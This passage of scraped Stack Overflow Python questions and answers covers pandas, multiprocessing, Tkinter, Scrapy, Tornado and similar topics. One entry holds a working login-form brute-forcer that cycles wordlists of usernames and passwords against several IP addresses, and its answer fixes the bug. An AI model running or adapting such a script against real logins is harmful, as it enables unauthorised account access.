> class 'module'
It shows that for `from package import subpackage`, Python intepreter always
takes the item as `module`, not `subpackage`.
from audio import sound
print(type(sound.echo))
Moreover, since `sound` is taken as `module`, how to access its `echo` module?
it will raise
> AttributeError: module 'audio.sound' has no attribute 'echo'
Hence, I wonder whether it is meaningful to import sub-package, or is it
possible to import subpackage?
Answer: There is only a
[`module`](https://docs.python.org/3/library/stdtypes.html#modules) type in
Python, `subpackage` is not a type.
All packages and subpackages are modules.
> is it possible to import subpackage
Yes? You already imported `sound` as a subpackage of `audio`...
> is it meaningful to import sub-package
Also, yes. How else would you use the classes and functions defined by any
module?
If you would like to import `echo`, then do so like this
from audio.sound import echo
|
Python load list from file and print random selection
Question: I have a file called `projects.txt` that contains the following line of code:
['Apollo', 'Astro', 'Aurora', 'Barcelona']
I use the following Python2 code to load the file and try to print a random
selection but I'm always getting just a single character from my list:
import random
projNames = open('projects.txt').read()
print(random.choice(projNames))
**Example Result:** a
* * *
However, if I copy the contents of the text file directly into the code, it
works properly for me.
import random
projNames = ['Apollo', 'Astro', 'Aurora', 'Barcelona']
print(random.choice(projNames))
**Example Result:** Apollo
I need it to be able to load the contents of the file directly rather than
editing the code in my `.py` file.
What did I overlook in my original code? I am specifically using Python 2.7.x
_(latest version)_.
Answer: You have to parse\eval string first to make it Python list:
import ast
import random
projNames = ast.literal_eval(open('projects.txt').read())
print(random.choice(projNames))
|
python pool doesn't work
Question: I'm trying to use multithreading and in order to keep it simple at first, i'm
running the following code:
import multiprocessing as mp
pool = mp.Pool(4)
def square(x):
return x**2
results=pool.map(square,range(1,20))
As i understand, results should be a list containig the squares from 1 to 20.
However, the code does not seem to terminate.(doing the same without pool
finishes in a blink, this ran for several minutes, before i stopped it
manually).
Additional information: task manager tells me, that the additional python
processes have been launched and are running, but are using zero % of my cpu;
still other unrelated processes like firefox skyrocket in their cpu usage,
while the programm is running. I'm using windows 8 and a i5-4300U cpu (pooling
to 2 instead of 4 doesn't help either)
What am i doing wrong? Are there any good ressources on the Pool class, which
could help me understand what is wrong with my code?
Answer: Code with pool initialization should be inside `__name__ == "__main__"` as
`multiprocessing` imports the module each time to spawn a new process.
import multiprocessing as mp
def square(x):
return x**2
if __name__ == '__main__':
pool = mp.Pool(4)
results=pool.map(square,range(1,20))
|
Can continuous random variables be converted into discrete using scipy?
Question: If I initialize a subclass of `scipy.stats.rv_continuous` , for example
`scipy.stats.norm`
>>> from scipy.stats import norm
>>> rv = norm()
Can I convert it into a list of probabilities with each element representing
the probability of a range of values after providing the number of ranges?
Something like - (for the range - [(-inf,-1), (-1,0), (0,1), (1, inf)] )
>>> li
[0.15865525393145707, 0.34134474606854293, 0.34134474606854293, 0.15865525393145707]
( where 0.15865525393145707 is the probability of the variable being less than
-1 and 0.34134474606854293 for being in the range -1 to 0 and similarly for
others.
Can this be done using scipy? If not which python library can support such
conversion operations?
Answer: Based on your comment, you can calculate this using the
[CDF](https://en.wikipedia.org/wiki/Cumulative_distribution_function):
from scipy.stats import norm
import numpy as np
>>> norm().cdf(-1) - norm().cdf(-np.inf), \
norm().cdf(0) - norm().cdf(-1), \
norm().cdf(1) - norm().cdf(0), \
norm().cdf(np.inf) - norm().cdf(1)
(0.15865525393145707,
0.34134474606854293,
0.34134474606854293,
0.15865525393145707)
This follows from the definition of the CDF, basically.
* * *
Note that I'm getting numbers that sum to 1, but not the ones you write as the
expected output. I don't know your basis for saying that those are the correct
ones. My guess is you're implicitly using a Normal variable with non-unit
standard deviation.
|
Pandas complex processing with groupby
Question: My data is grouped by id. In each group, it is sorted by colB. The logic I
need to implement is as follows:
If colA is blank, and colD is either (2,3, or 4), then create a column called
'flag' and set flag = 1 in the last non-zero row of colC. Set the flag to 0 in
all the other rows of that group, where colC is non-zero. Remove the rows
where (colA is blank, and colC is 0) for that particular grouping.
Repeat above procedure for all other 'id' groups.
(For rows where colA is non-blank, I can set the flag to what I need.)
Here is the data I have:
id colA ColB colC colD
1 10 1352.23 2
1 11 706.87 2
1 12 1116.6 2
1 13 0 2
1 14 0 2
1 15 0 2
2 2 6884.03 3
2 3 2235.97 3
2 4 3618.04 3
2 5 11745.42 3
3 2013 1 345.98 0
and here is what I would like to get after processing it.
id colA ColB colC colD flag
1 10 1352.23 2 0
1 11 706.87 2 0
1 12 1116.6 2 1
2 2 6884.03 3 0
2 3 2235.97 3 0
2 4 3618.04 3 0
2 5 11745.42 3 1
3 2013 1 345.98 0 0
The data contains many thousands of such groupings. I am hoping someone can
help me in figuring out what the Python code to do the above processing would
look like. I have a basic familiarity with the groupby function, but not to
the extent to be able to figure out how to do the above.
* * *
Here is the code I am trying to use. The code give errors: "AttributeError:
'str' object has no attribute 'id'."
I am trying to set the "flag" to NaN when I detect the zeros in colC that I
eventually want to remove, so I can drop them easily, in a later step.
def setFlag(grouped):
for name, group in grouped:
for i in range(group.id.size):
drop_candidate = (
pd.isnull(group.iloc[i]['colA'])&
( (group.iloc[i]['colD'] == 2) |
(group.iloc[i]['colD'] == 3) |
(group.iloc[i]['colD'] == 4) )
)
last_nonZero = group[group != 0].index[-1]
if ( (drop_candidate & (group.iloc[i]['colC'] == 0)) ):
group['flag'] = np.nan
elif ((drop_candidate & (group.iloc[i]['colC'] != 0)) & (last_nonZero != i)):
group['flag'] = 0
elif last_nonZero == i:
group['flag'] = 1
return grouped
df.groupby('id').apply(setFlag)
Here is the code to re-create the test dataframe:
import pandas as pd
import numpy as np
df = pd.DataFrame.from_items([
('id', [1,1,1,1,1,1,2,2,2,2,3]),
('colA', [np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,2013]),
('colB', [10,11,12,13,14,15,2,3,4,5,1]),
('colC', [1352.23,706.87,1116.6,0,0,0,6884.03,2235.97,3618.04,11745.42,345.98]),
('colD', [2,2,2,2,2,2,3,3,3,3,0]),
('flag', [np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,]),
])
Answer: It looks like there are three parts to your process:
1) Get rid of rows where colA is null and colC == 0. Work on reducing your
dataframe first
if it is AND logic:
`reduced_df = df.loc[(df.colA.notnull()) & (df.colC != 0), :].copy()`
if it is OR logic:
reduced_df = df.loc[(df.colA.notnull()) | (df.colC != 0), :].copy()
id colA colB colC colD flag
0 1 NaN 10 1352.23 2 NaN
1 1 NaN 11 706.87 2 NaN
2 1 NaN 12 1116.60 2 NaN
6 2 NaN 2 6884.03 3 NaN
7 2 NaN 3 2235.97 3 NaN
8 2 NaN 4 3618.04 3 NaN
9 2 NaN 5 11745.42 3 NaN
10 3 2013 1 345.98 0 NaN
2) Now you are ready to work on part two which is flagging the last column of
a group. Since the default flag value is 0, start with that
`reduced_df.loc[:, 'flag'] = 0`
3) You can find duplicate values using `duplicated` and then make sure colA is
null
reduced_df.loc[~reduced_df.colD.duplicated(keep='last') & reduced_df.colA.isnull(), 'flag'] = 1
reduced_df
id colA colB colC colD flag
0 1 NaN 10 1352.23 2 0
1 1 NaN 11 706.87 2 0
2 1 NaN 12 1116.60 2 1
6 2 NaN 2 6884.03 3 0
7 2 NaN 3 2235.97 3 0
8 2 NaN 4 3618.04 3 0
9 2 NaN 5 11745.42 3 1
10 3 2013 1 345.98 0 0
|
import a module with a variable
Question: Hello dear programmers Python language. I have a question about importing
modules in another module with Python 2.7.
I want to know how to import a .py module in the form of a variable. In fact,
I would like to import a module based on the needs of my main module to limit
the memory usage of the computer.
For example, suppose I have 25 modules: 1.py, 2.py ... 25.py Suppose my main
module P.y needs, at some point, the modules 2, 7, 15 and 24.py but not the
others. Because, I don't know which modules the main module needs, I currently
import all modules with the import function: import 1 2 3 ... 25 Is there a
python function to import only the modules 2, 7,15 and 24 with a variable ?
(for example: somethink_like_import (variable) where variable contains the
module name to import.)
Thank you.
Answer: Yes!
from importlib import import_module
module = import_module(variable)
Example:
>>> os = import_module("os")
>>> os.name
'nt'
|
Three nested for loops in python fail
Question: I am trying to write a HTML Form brute forcer with three Nested For loops, one
for IP one for USER and one for PASSWORDS, however my code tries all correct
user:pass combinations for the first IP address, write three times the found
one and then fails. I would like to try all user:pass combinations for all the
three IP addresses. Here is the code:
import ssl
import base64
import sys
import urllib
import urllib2
import socket
ssl._create_default_https_context = ssl._create_unverified_context
if len(sys.argv) !=4:
print "usage: %s userlist passwordlist" % (sys.argv[0])
sys.exit(0)
filename1=str(sys.argv[1])
filename2=str(sys.argv[2])
#filename3=str(sys.argv[3])
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')
#targets = open(filename3,'r')
targets = ['192.168.2.1', '192.168.2.1', '192.168.2.2']
#url = "https://192.168.2.1:8443/login.cgi"
foundusers = []
foundcreds = []
OkStr="url=index.asp"
headers = {}
headers['User-Agent'] = "Googlebot"
i=0
for ip in targets:
url = "https://"+ip.rstrip()+":8443/login.cgi"
for user in userlist.readlines():
for password in passwordlist.readlines():
credentials=base64.b64encode(user.rstrip()+':'+password.rstrip())
#print "trying "+user.rstrip()+':'+password.rstrip()
data = urllib.urlencode({'login_authorization': credentials})
try:
req = urllib2.Request(url, data, headers=headers)
request = urllib2.urlopen(req, timeout = 3)
response = request.read()
print 'ip=%r user=%r password=%r' % (ip, user, password)
#print "[%d]" % (request.code)
if (response.find(OkStr)>0):
foundcreds.append(user.rstrip()+':'+password.rstrip())
request.close()
except urllib2.HTTPError, e:
print "[-] Error = "+str(e)
pass
except socket.timeout, e:
print "[-] Error = "+str(e)
pass
except ssl.SSLError, e:
print "[-] Error = "+str(e)
pass
except urllib2.URLError, e :
print "[-] Error = "+str(e)
pass
if len(foundcreds)>0:
print "Found User and Password combinations:\n"
for name in foundcreds:
print name+"\n"
else:
print "No users found\n"
This is the output:
ip='192.168.2.1' user='admin\n' password='asd\n'
ip='192.168.2.1' user='admin\n' password='qwer\n'
ip='192.168.2.1' user='admin\n' password='rews\n'
ip='192.168.2.1' user='admin\n' password='test\n'
Found User and Password combinations:
admin:test
Found User and Password combinations:
admin:test
Found User and Password combinations:
admin:test
Answer: To implement P. Brunet's suggestion, change this:
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')
to:
userlist = open(filename1,'r').readlines()
passwordlist = open(filename2,'r').readlines()
then remove the `.readlines()` from your iterators.
|
To_CSV unique values of a pandas column
Question: When I use the following:
import pandas as pd
data = pd.read_csv('C:/Users/Z/OneDrive/Python/Exploratory Data/Aramark/ARMK.csv')
x = data.iloc[:,2]
y = pd.unique(x)
y.to_csv('yah.csv')
I get the following error:
AttributeError: 'numpy.ndarray' object has no attribute 'to_csv'
Answer: IIUC, starting from a dataframe:
df = pd.DataFrame({'a':[1,2,3,4,5,6],'b':['a','a','b','c','c','b']})
you can get the unique values of a column with:
g = df['b'].unique()
that returns an array:
array(['a', 'b', 'c'], dtype=object)
to save it into a .csv file I would transform it into a `Series` s:
In [22]: s = pd.Series(g)
In [23]: s
Out[23]:
0 a
1 b
2 c
dtype: object
So you can easily save it:
In [24]: s.to_csv('file.csv')
Hope that helps.
|
Logic error in python turtle
Question: I am coding in python 3.2 turtle and I have this beautiful drawing of a tank.
and I know how to move it left and write. However, when trying to make the
tank move up and down. I am faced with the problem that it goes up but if I
let go and press the up button again. It turns to the left. It might be hard
to explain so I included code.
"""
Programmer: Bert
Tank Run 1
"""
#------------------------------------------------------------------------------
#Importing random modules geddit
from turtle import *
from turtle import Turtle
import turtle
import random
#Welcome Statement and story
input("WELCOME TO TANK RUN 1!! PRESS ENTER TO CONTINUE")
Name = input("Name your Tank: ")
quitFunction = input(
"""The """ + Name + """ is in a battle and heading toward the
enemy base camp so that the """ + Name + """ can blow it up
Get to the base camp and do not let enemy
artillery, or soldiers kill you. Good luck"""
)
#setting up variables
unVar1 = 25
unVar2 = 100
unVar3 = 90
unVar4 = 150
unVar5 = -30
unVar6 = 75
unVar7 = 50
t = Turtle()
#defining shapes
def polySquare(t, x, y, length):
t.goto(x, y)
t.setheading(270)
t.begin_poly()
for count in range(4):
t.forward(length)
t.left(90)
t.end_poly()
return t.get_poly()
def polyCircle(t, x, y, radius):
t.up()
t.goto(x, y)
t.down()
t.hideturtle()
t.circle(radius)
t.end_poly()
return t.get_poly()
def polyRectangle(t, x, y, length1, length2):
t.goto(x, y)
t.setheading(270)
t.begin_poly()
for count in range(2):
t.forward(length1)
t.left(90)
t.forward(length2)
t.left(90)
t.end_poly()
return t.get_poly()
def drawLine(t, x1, x2, y1, y2):
t.up()
t.hideturtle()
t.goto(x1, y1)
t.do+wn()
t.goto(x2, y2)
def tankCursor():
"""
Create the tank cursor. An alternate solution is to toss the temporary turtle
and use the commented out polygon assignments instead of the poly* function calls
"""
temporary = turtle.Turtle()
screen = turtle.getscreen()
delay = screen.delay()
screen.delay(0)
temporary.hideturtle()
temporary.penup()
tank = turtle.Shape("compound")
# tire1 = ((10, unVar1), (10, unVar1 - unVar6), (10 + 30, unVar1 - unVar6), (10 + 30, unVar1))
tire1 = polyRectangle(temporary, 10, unVar1, unVar6, 30) # Tire #1
tank.addcomponent(tire1, "gray", "black")
# tire2 = ((110, unVar1), (110, unVar1 - unVar6), (110 + 30, unVar1 - unVar6), (110 + 30, unVar1))
tire2 = polyRectangle(temporary, 110, unVar1, unVar6, 30) # Tire #2
tank.addcomponent(tire2, "gray", "black")
# tire3 = ((110, unVar2), (110, unVar2 - unVar6), (110 + 30, unVar2 - unVar6), (110 + 30, unVar2))
tire3 = polyRectangle(temporary, 110, unVar2, unVar6, 30) # Tire #3
tank.addcomponent(tire3, "gray", "black")
# tire4 = ((10, unVar2), (10, unVar2 - unVar6), (10 + 30, unVar2 - unVar6), (10 + 30, unVar2))
tire4 = polyRectangle(temporary, 10, unVar2, unVar6, 30) # Tire #4
tank.addcomponent(tire4, "gray", "black")
# bodyTank = ((20, unVar3), (20, unVar3 - 130), (20 + 110, unVar3 - 130), (20 + 110, unVar3))
bodyTank = polyRectangle(temporary, 20, unVar3, 130, 110)
tank.addcomponent(bodyTank, "black", "gray")
# gunTank = ((65, unVar4), (65, unVar4 - 100), (65 + 20, unVar4 - 100), (65 + 20, unVar4))
gunTank = polyRectangle(temporary, 65, unVar4, 100, 20) # Gun
tank.addcomponent(gunTank, "black", "gray")
# exhaustTank = ((50, unVar5), (50, unVar5 - 20), (50 + 10, unVar5 - 20), (50 + 10, unVar5))
exhaustTank = polyRectangle(temporary, 50, unVar5, 20, 10)
tank.addcomponent(exhaustTank, "black", "gray")
# turretTank = ((50, unVar7), (50, unVar7 - 50), (50 + 50, unVar7 - 50), (50 + 50, unVar7))
turretTank = polySquare(temporary, 50, unVar7, 50) # Turret
tank.addcomponent(turretTank, "red", "gray")
turtle.addshape("tank", shape=tank)
del temporary
screen.delay(delay)
tankCursor() # creates and registers the "tank" cursor shape
tank = turtle
tank.shape("tank")
turtle.up() # get rid of the ink
screen = turtle.Screen()
def moveforward(): #I cannot get this function to work
tank.left(90)
tank.forward(40)
def movebackward(): #I cannot get this function to work
tank.left(90)
tank.backward(40)
def moveright():
tank.forward(40)
def moveleft():
tank.backward(40)
#Background color
t.screen.bgcolor("green")
#Movement of tank
screen.onkeypress(moveright, "Right")
screen.onkeypress(moveleft, "Left")
screen.onkeypress(moveforward, "Up")
screen.onkeypress(movebackward, "Down")
Answer: This is an example of what I think is consistent motion: regardless of tank
orientation, 'up' is forward, 'down' is backward, 'left' is 90 degrees to the
left and 'right' is 90 degrees to the right.
I've redone the tank cursor to it's center is the center of the turret and
removed the `setheading()` calls from the drawing routines. I've also stripped
down the example just to demonstrate the motion:
import turtle
# Defining shapes
def polySquare(t, x, y, length):
t.goto(x, y)
t.begin_poly()
for count in range(4):
t.forward(length)
t.left(90)
t.end_poly()
return t.get_poly()
def polyRectangle(t, x, y, length1, length2):
t.goto(x, y)
t.begin_poly()
for count in range(2):
t.forward(length1)
t.left(90)
t.forward(length2)
t.left(90)
t.end_poly()
return t.get_poly()
def tankCursor():
"""
Create the tank cursor.
"""
temporary = turtle.Turtle()
temporary.hideturtle()
temporary.penup()
screen = turtle.getscreen()
delay = screen.delay()
screen.delay(0)
tank = turtle.Shape("compound")
tire1 = polyRectangle(temporary, -65, -75, 30, 75) # Tire #1
tank.addcomponent(tire1, "gray", "black")
tire2 = polyRectangle(temporary, 35, -75, 30, 75) # Tire #2
tank.addcomponent(tire2, "gray", "black")
tire3 = polyRectangle(temporary, 35, 0, 30, 75) # Tire #3
tank.addcomponent(tire3, "gray", "black")
tire4 = polyRectangle(temporary, -65, 0, 30, 75) # Tire #4
tank.addcomponent(tire4, "gray", "black")
bodyTank = polyRectangle(temporary, -55, -65, 110, 130)
tank.addcomponent(bodyTank, "black", "gray")
gunTank = polyRectangle(temporary, -10, 25, 20, 100) # Gun
tank.addcomponent(gunTank, "black", "gray")
exhaustTank = polyRectangle(temporary, -25, -75, 10, 20)
tank.addcomponent(exhaustTank, "black", "gray")
turretTank = polySquare(temporary, -25, -25, 50) # Turret
tank.addcomponent(turretTank, "red", "gray")
turtle.addshape("tank", shape=tank)
del temporary
screen.delay(delay)
tankCursor() # creates and registers the "tank" cursor shape
turtle.shape("tank")
turtle.up() # get rid of the ink
# Movement of tank
screen = turtle.Screen()
screen.onkeypress(lambda : turtle.right(90), "Right")
screen.onkeypress(lambda : turtle.left(90), "Left")
screen.onkeypress(lambda : turtle.forward(40), "Up")
screen.onkeypress(lambda : turtle.backward(40), "Down")
turtle.listen()
turtle.mainloop()
|
How to tune parameters in Random Forest ? (Python Scikit Learn)
Question:
class sklearn.ensemble.RandomForestClassifier(n_estimators=10, criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1, min_weight_fraction_leaf=0.0, max_features='auto', max_leaf_nodes=None, bootstrap=True, oob_score=False, n_jobs=1, random_state=None, verbose=0, warm_start=False, class_weight=None)
I'm using a random forest model w/ 9 samples and about 7000 attributes. Of
these samples, there are 3 categories that my classifier recognizes.
I know this is far from ideal conditions but I'm trying to figure out which
attributes are the most important in feature predictions. **Which parameters
would be the best to tweak for optimizing feature importance?**
I tried different `n_estimators` and noticed that the amount of "significant
features" (i.e. nonzero values in the `feature_importances_` array) increased
dramatically.
I've read through the documentation but if anyone has any experience in this,
**I would like to know which parameters are the best to tune and a brief
explanation why.**
Answer: From my experience, there are three features worth exploring with the sklearn
RandomForestClassifier, in order of importance:
* `n_estimators`
* `max_features`
* `criterion`
`n_estimators` is not really worth optimizing. The more estimators you give
it, the better it will do. 500 or 1000 is usually sufficient.
`max_features` is worth exploring for many different values. It may have a
large impact on the behavior of the RF because it decides how many features
each tree in the RF considers at each split.
`criterion` may have a small impact, but usually the default is fine. If you
have the time, try it out.
Make sure to use sklearn's [GridSearch](http://scikit-
learn.org/stable/modules/grid_search.html) (preferably GridSearchCV, but your
data set size is too small) when trying out these parameters.
If I understand your question correctly, though, you only have 9 samples and 3
classes? Presumably 3 samples per class? It's very, very likely that your RF
is going to overfit with that little amount of data, unless they are good,
representative records.
|
How to parse a number as either an int or a float, depending on required precision?
Question: Requirements:
1. Input can be either string or number
2. If input could be treated as an int without loss of precision, cast to int
3. If input could be treated as a float, cast to float
Here is the section of code where I am using this.
def make_operand(symbol, left=None, right=None):
valid_symbols = ['*', '/', '+', '-']
if symbol in valid_symbols:
return Operand(symbol, left, right)
as_int = re.compile("^-?[0-9]+$").match(str(symbol))
as_float = re.compile("^[-+]?[0-9]*\.?[0-9]+$").match(str(symbol))
as_number = int(symbol) if as_int else float(symbol) if as_float else None
if as_number:
return NumericOperand(as_number)
raise ValueError("Invalid symbol or number")
This works but it looks messy and smells wrong.
An implementation using try blocks also works, but seems less simple:
as_number = None
try:
as_float = float(symbol)
except ValueError:
as_float = None
if as_float:
as_int = int(as_float)
as_number = as_int if as_int == as_float else as_float
if as_number:
return NumericOperand(as_number)
raise ValueError("Invalid symbol or number")
Is there a better approach, or is one of these close to the Pythonic method of
doing things?
Answer: If you don't mind third party modules, there is a C-exension module called
[fastnumbers](https://pypi.python.org/pypi/fastnumbers) that was designed
exactly for this purpose. The
[fast_real](http://pythonhosted.org/fastnumbers/fast.html#fast-real) function
does exactly what you are looking for (provided you use `coerce=True`,
available on `fastnumbers>=0.7.4`).
Full disclosure, I am the author.
>>> from fastnumbers import fast_real
>>> fast_real('56')
56
>>> fast_real('56.0')
56
>>> fast_real('56.07')
56.07
>>> fast_real('56.07 lb')
'56.07 lb'
>>> fast_real(56.07)
56.07
>>> fast_real(56.0)
56.0
>>> fast_real(56.0, coerce=True)
56
>>> fast_real(56)
56
>>> fast_real('56.07 lb', raise_on_invalid=True)
Traceback (most recent call last):
...
ValueError: could not convert string to float: '56.07 lb'
|
Run Multiple Spider sequentially
Question:
Class Myspider1
#do something....
Class Myspider2
#do something...
The above is the architecture of my spider.py file. and i am trying to run the
Myspider1 first and then run the Myspider2 multiples times depend on some
conditions. How Could I do that??? any tips?
configure_logging()
runner = CrawlerRunner()
def crawl():
yield runner.crawl(Myspider1,arg.....)
yield runner.crawl(Myspider2,arg.....)
crawl()
reactor.run()
I am trying to use this way.but have no idea how to run it. Should I run the
cmd on the cmd(what commands?) or just run the python file??
thanks a lot!!!
Answer: **run the python file**
for example: **test.py**
import scrapy
from twisted.internet import reactor, defer
from scrapy.crawler import CrawlerRunner
from scrapy.utils.log import configure_logging
class MySpider1(scrapy.Spider):
# Your first spider definition
name = "dmoz"
allowed_domains = ["dmoz.org"]
start_urls = [
"http://www.dmoz.org/Computers/Programming/Languages/Python/Books/"
]
def parse(self, response):
print "first spider"
class MySpider2(scrapy.Spider):
# Your second spider definition
name = "dmoz"
allowed_domains = ["dmoz.org"]
start_urls = [
"http://www.dmoz.org/Computers/Programming/Languages/Python/Resources/"
]
def parse(self, response):
print "second spider"
configure_logging()
runner = CrawlerRunner()
@defer.inlineCallbacks
def crawl():
yield runner.crawl(MySpider1)
yield runner.crawl(MySpider2)
reactor.stop()
crawl()
reactor.run() # the script will block here until the last crawl call is finished
Now run **python test.py > output.txt**
You can observe from the output.txt that your spiders run sequentially.
|
How to create a pandas DataFrame from its indexes and a two variable function?
Question: This is a common pattern I've been using:
rows = ['Joe','Amy','Tom']
columns = ['account_no', 'balance']
def f(row, column):
'''Fetches value from database'''
return np.random.random()
pd.DataFrame([[f(row, column) for column in columns] for row in rows], index=rows, columns=columns)
If the rows and columns are numerical, I can also use np.meshgrid:
rows = [1,2,3]
columns = [4,5]
pd.DataFrame(np.vectorize(f)(xs, ys), index=rows, columns=columns)
My question is, what is the most elegant/Pythonic/"pandasic"/fastest/most
readable way to doing this in the general case?
Thanks!
Answer: a way of doing this could be to turn your function into a ufunc, and then use
[outer](http://docs.scipy.org/doc/numpy-1.10.1/reference/generated/numpy.ufunc.outer.html)
import numpy as np
uf = np.frompyfunc(f, 2, 1) # f has 2 inputs, 1 outputs
pd.DataFrame(uf.outer(rows, columns), index=rows, columns=columns)
one criterion you have above though is 'most readable' for which I'd say your
existing for loop solution is best.
|
Error when trying to install plotly
Question:
pip install plotly
Gave me a permissions error
sudo pip install plotly
Worked and installed plotly, tried to 'import plotly' , ImportError: No module
named 'plotly'
* * *
now when i do this again:
pip install plotly
"Requirement already satisfied" but still doesnt import.
sudo pip install plotly --upgrade
OSError: [Errno 1] Operation not permitted: '/tmp/pip-PbshIM-
uninstall/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/six-1.4.1-py2.7.egg-
info'
Answer: Since you're on a Mac, running `pip` will install a package into the Mac's own
copy of Python 2.7. You're then running Python, which is likely Python 3 and
hence _not_ the Mac's own copy.
To `pip install` something into your installation of Python 3, use `pip3`
instead:
sudo pip3 install plotly
|
Converting Python 3 libraries to be used in 2.7
Question: I'm following a tutorial which is coded in Python 3 and the author uses
from urllib import parse
which gives me an error.
I've tried using Google and reading up about the library but can't seem to
find equivalent. All my code for project is in 2.7 so I would prefer not to
have to move over 3 just for this little bit.
Thanks for any help in advance.
Answer: Urllib has been restructured in python 3. What was
[urlparse](https://docs.python.org/2/library/urlparse.html#module-urlparse) in
python 2, is now urllib.parse (in python 3). So just use urlparse. You can
even do this: `import urlparse as parse` and the rest of the code should be
the same.
|
unable to run more than one tornado process
Question: I've developed a tornado app but when more than one user logs in it seems to
log the previous user out. I come from an Apache background so I thought
tornado would either spawn a thread or fork a process but seems like that is
not what is happening.
To mitigate this I've installed nginx and configured it as a reverse proxy to
forward incoming requests to an available tornado process. Nginx seems to work
fine however when I try to start more than one tornado process using a
different port I get the following error:
http_server.listen(options.port)
File "/usr/local/lib/python2.7/dist-packages/tornado/tcpserver.py", line 125, in listen
sockets = bind_sockets(port, address=address)
File "/usr/local/lib/python2.7/dist-packages/tornado/netutil.py", line 145, in bind_sockets
sock.bind(sockaddr)
File "/usr/lib/python2.7/socket.py", line 224, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 98] Address already in use
basically i get this for each process I try to start on a different port.
I've read that I should use supervisor to manage my tornado processes but I'm
thinking that is more of a convenience. At the moment I'm wondering if the
problem has to do with my actual tornado code or my setup somewhere? My python
code looks like this:
from tornado.options import define, options
define("port", default=8000, help="run on given port", type=int)
....
http_server = tornado.httpserver.HTTPServer(app)
http_server.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
my handlers all work fine and I can access the site when I go to
localhost:8000 just need a pair of fresh eyes please. ;)
Answer: Well I solved the problem. I had .sh file that tried to start multiple
processes with:
python initpumpkin.py --port=8000&
python initpumpkin.py --port=8001&
python initpumpkin.py --port=8002&
python initpumpkin.py --port=8003&
unfortunately I didn't tell tornado to parse the command line options so I
would always get that address always in use error since port '8000' was
defined as my default port, so it would attempt to listen on that port each
time. In order to mitigate this make sure to declare
tornado.options.parse_command_line() after main:
if __name__ == "__main__":
tornado.options.parse_command_line()
then run from the CLI with whatever arguments.
|
python 3.5 pass object from one class to another
Question: I am trying to figure out how to pass data from one class into another. My
knowledge of python is very limited and the code I am using has been taken
from examples on this site.
I am trying to pass the User name from "UserNamePage" class into "WelcomePage"
class. Can someone please show me how to achieve this. I will be adding more
pages and I will need to pass data between the different pages
Below is the full code - as mentioned above most of this code has come from
other examples and I am using these examples to learn from.
import tkinter as tk
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
import datetime
import re
def Chk_String(mystring):
Allowed_Chars = re.compile('[a-zA-Z_-]+$')
return Allowed_Chars.match(mystring)
def FnChkLogin(Page):
booAllFieldsCorrect = False;
myFName = Page.FName.get()
myFName = myFName.replace(" ", "")
myLName = Page.LName.get()
myLName = myLName.replace(" ", "")
if myFName == "":
messagebox.showinfo('Login Ifo is Missing', "Please type in your First Name")
elif not Chk_String(myFName):
messagebox.showinfo('First Name Error:', "Please only use Leter or - or _")
elif myLName == "":
messagebox.showinfo('Login Info is Missing', "Please type in your Last Name")
elif not Chk_String(myLName):
messagebox.showinfo('Last Name Error:', "Please only use Leter or - or _")
else:
booAllFieldsCorrect = True;
if booAllFieldsCorrect == True:
app.geometry("400x200")
app.title("Welcome Screen")
PageController.show_frame(app,"WelcomePage")
def FnAddButton(Page,Name,Label,Width,X,Y,FnAction):
Name = ttk.Button (Page, text=Label,width=int(Width),command=FnAction)
Name.place(x=int(X),y=int(Y))
class PageController(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
container = tk.Frame(self)
container.pack(side="top",fill="both",expand="True")
container.grid_rowconfigure(0,weight=1)
container.grid_columnconfigure(0,weight=1)
self.frames={}
for F in (UserNamePage,WelcomePage):
page_name = F.__name__
frame = F(container,self)
self.frames[page_name] = frame
frame.grid(row=0,column=0,sticky="nsew")
self.show_frame("UserNamePage")
def show_frame(self,page_name):
frame= self.frames[page_name]
frame.tkraise()
class UserNamePage(tk.Frame):
def __init__(self,parent,controller):
tk.Frame.__init__(self,parent)
self.controller = controller
lblFName = Label(self,text="First Name ",relief=GROOVE,width=12,anchor=E).place(x=50,y=50)
lblLName = Label(self,text="Last Name ",relief=GROOVE,width=12,anchor=E).place(x=50,y=75)
self.FName = StringVar()
inputFName = Entry(self,textvariable=self.FName,width=25).place(x=142,y=50)
self.LName = StringVar()
inputLName = Entry(self,textvariable=self.LName,width=25).place(x=142,y=75)
cmdContinue = ttk.Button (self, text='Continue',width=9,command=lambda:FnChkLogin(self)).place(x=320,y=70)
class WelcomePage(tk.Frame):
def __init__(self,parent,controller):
tk.Frame.__init__(self,parent)
self.controller = controller
UserNamePageData = UserNamePage(parent,controller)
UserFName = str(UserNamePageData.FName)
UserLName = str(UserNamePageData.LName)
strWelcome = "Welcome " + UserFName + " " + UserLName
lblWelcome = Label(self,text=strWelcome,relief=FLAT,width=50,anchor=W).place(x=25,y=25)
if __name__ == "__main__":
app = PageController()
app.geometry("400x200")
app.title("User Page")
app.eval('tk::PlaceWindow %s center' % app.winfo_pathname(app.winfo_id()))
app.mainloop()
Answer: In the method `show_frame(self,page_name)` in class `PageController`, add the
following lines
if page_name == 'WelcomePage':
self.frames['WelcomePage'].UserFName = self.frames['UserNamePage'].FName.get()
self.frames['WelcomePage'].UserLName = self.frames['UserNamePage'].LName.get()
and remove the two lines `UserFName = str(UserNamePageData.FName)`and
`UserLName = str(UserNamePageData.LName)`.
Explanation: it must be done in a place that has references to both frames
(i.e. class `PageController`).
|
How to wait a page is loaded in Python Selenium
Question:
try:
next_page_elem = self.browser.find_element_by_xpath("//a[text()='%d']" % pageno)
except noSuchElementException:
break
print('page ', pageno)
next_page_elem.click()
sleep(10)
I have a page contains information about reports inside a frame. When i use
sleep method to wait for next page to load it works, and without it i kept
getting the information on page 1. Beside the sleep is there a better to do
this in selenium. I have tried out some previous post that is similar but i
think the html i have is quite unique please see example below. [Selenium
Python: how to wait until the page is
loaded?](http://stackoverflow.com/questions/26566799/selenium-python-how-to-
wait-until-the-page-is-loaded) Any help I would be much appreciated. Thanks
